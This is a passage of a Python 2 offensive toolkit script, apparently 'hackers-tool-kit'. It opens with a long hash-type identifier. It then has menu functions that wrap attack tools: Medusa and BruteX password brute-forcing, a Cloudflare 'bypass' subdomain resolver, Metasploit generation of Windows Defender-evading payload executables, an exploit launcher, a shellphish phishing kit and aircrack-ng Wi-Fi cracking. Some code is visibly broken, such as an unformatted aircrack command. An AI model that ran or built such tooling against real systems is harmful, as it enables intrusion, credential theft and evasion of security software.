hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -def upgrade(): - os.system("apt update && apt upgrade") -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -def terminal(): - os.system("gnome-terminal") -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == 